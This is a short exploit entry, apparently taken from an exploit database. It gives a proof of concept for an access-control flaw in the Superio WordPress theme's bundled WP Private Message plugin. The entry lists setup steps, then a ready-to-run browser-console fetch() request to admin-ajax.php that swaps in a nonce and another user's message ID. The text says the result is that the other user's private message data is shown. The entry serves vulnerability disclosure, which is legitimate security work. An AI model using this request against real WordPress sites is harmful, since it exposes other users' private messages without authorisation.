## https://sploitus.com/exploit?id=WPEX-ID:F915E5AC-E216-4D1C-AEC1-C3BE11E2A6DE
- Install the Superio theme and its WP Private Message bundled plugin.
- Create a new private message in the backend.
- Log in as a different user.
- Generate a nonce for the logged-in user.
- From the browser console, run the following request, replacing the NONCE and MESSAGE_ID:
```
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": "action=wp_private_message_choose_message&nonce=NONCE&message_id=MESSAGE_ID",
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));
```
- See the message data.